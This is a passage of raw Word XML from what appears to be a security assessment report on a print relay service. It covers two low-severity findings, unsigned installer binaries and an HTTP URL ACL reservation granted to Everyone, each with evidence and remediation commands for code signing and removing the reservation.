    <w:p w14:paraId="1F3B4F87" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A3CB65" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597D0331" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F6FB2B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FB332D" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC2289F" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C07657A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307A3935" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCE9587" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6460615D" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C06B9C" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0EB7CD" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D869009" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70107216" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF52B3B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2040E4C3"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5D045000" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ACF7D8A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="_Toc9000008"/>
            <w:bookmarkStart w:id="21" w:name="_Toc232079918"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>9. Unsigned Application Binaries and Installer - Low</w:t>
            </w:r>
            <w:bookmarkEnd w:id="20"/>
            <w:bookmarkEnd w:id="21"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="550FDFAA"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="097E08A3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E19A0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRPr="00711F1D" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Rating: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 4.4 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9E2BE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected components: </w:t>
      </w:r>
      <w:r>
        <w:t>setup.exe, DesktopPrintRelayInstaller.msi, DesktopPrintRelayService.Host.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C8824" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of the delivered artifacts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Authenticode-signed: the executables contain no certificate table and the MSI contains no digital-signature stream. Users and endpoint controls therefore have no cryptographic assurance of the software's authenticity or integrity. A tampered or trojanized build cannot be distinguished from a legitimate one, and publisher-based allow-listing controls (SmartScreen reputation, AppLocker/WDAC publisher rules) cannot be applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF7CF4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F99F77" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Signature verification performed during the assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40678567" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E758CD8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setup.exe                         PE Security directory size = 0   -&gt; UNSIGNED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA91ECC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe PE Security directory size = 0   -&gt; UNSIGNED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F5A45" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DesktopPrintRelayInstaller.msi    no \x05DigitalSignature stream    -&gt; UNSIGNED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06BA97" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06313589" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF73DB" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: make build authenticity verifiable end-to-end so tampered or spoofed binaries are rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C5D0C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Authenticode-sign all artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A4996" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sign both executables and the MSI with an organization (preferably EV) code-signing certificate, and add a trusted timestamp so signatures remain valid after the cert expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625CA1F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>signtool sign /fd SHA256 /tr http://timestamp.digicert.com /td SHA256 ^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    /a DesktopPrintRelayService.Host.exe setup.exe DesktopPrintRelayInstaller.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7DDCF" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Verify on deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894F9CF" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Distribute through a trusted channel and enforce publisher rules so only signed, known-publisher builds run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640491A" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>signtool verify /pa /all DesktopPrintRelayInstaller.msi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t># plus AppLocker / WDAC publisher rule allowing only your signing identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B412831" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) signtool verify succeeds on every artifact; (2) an unsigned or re-signed build is blocked by the publisher policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF86B0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="31CEF231" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E1CFC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-347: Improper Verification of Cryptographic Signature — cwe.mitre.org/data/definitions/347.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AF1EC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Authenticode code signing — learn.microsoft.com/windows-hardware/drivers/install/authenticode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBFC6AD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C153A45" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B2E8CF9" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50570468" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294507F8" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A05D035" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B11C45B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A814C34" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2838C633" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47B5CD" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10FEDC17" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB5B641" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D6C661" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20245AC3" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3C34BE" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3037E79F" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BC16A1" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAF0711" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2BFD91" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDCDAC8" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">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7800B025" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27358974" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="22" w:name="_Toc9000009"/>
            <w:bookmarkStart w:id="23" w:name="_Toc232079919"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>10. Over-Permissive HTTP URL ACL Reservation (Everyone) - Low</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>
            <w:bookmarkEnd w:id="23"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BE7003B"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D727E0A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A368D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Rating: </w:t>
      </w:r>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 3.3 (</w:t>
      </w:r>
      <w:r>
        <w:t>AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB8ECB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:r>
        <w:t>Utils.RegisterServiceUrl (startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1FE34" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>During startup the application executes netsh http add urlacl url=http://&lt;hostname&gt;:&lt;port&gt;/ user=everyone, granting the Everyone group the right to reserve and bind that HTTP URL namespace. While the relay's listener uses Kestrel sockets bound to loopback (so this http.sys reservation is largely vestigial today), granting the namespace to Everyone is poor hygiene: any local user may reserve the namespace, and were any http.sys-based listener introduced, it could enable local namespace hijacking or squatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111DF7F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B7AD02" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed Utils.RegisterServiceUrl (decompiled from IL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274DD1A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2852F657" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url = "http://" + Dns.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GetHostEntry("</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>").HostName + ":" + port;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1392B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>StartProcess("netsh", "http add urlacl url=" + url + " user=everyone");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAE260" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Listener </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>actually binds</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Kestrel: options.Listen(IPAddress.Loopback, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B6476" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4699F475" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44146F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: remove the over-broad http.sys reservation; Kestrel does not need it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD09754" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Remove or scope the reservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A4369" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Delete the netsh urlacl step. If a reservation is genuinely required, scope it to the specific low-privilege service account instead of Everyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A090170" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>netsh http delete urlacl url=http://+:PORT/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t># if truly required, scope to the service account:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>netsh http add urlacl url=http://127.0.0.1:PORT/ user="DOMAIN\svc-printrelay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56890DE9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Bind explicitly to loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E796E2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
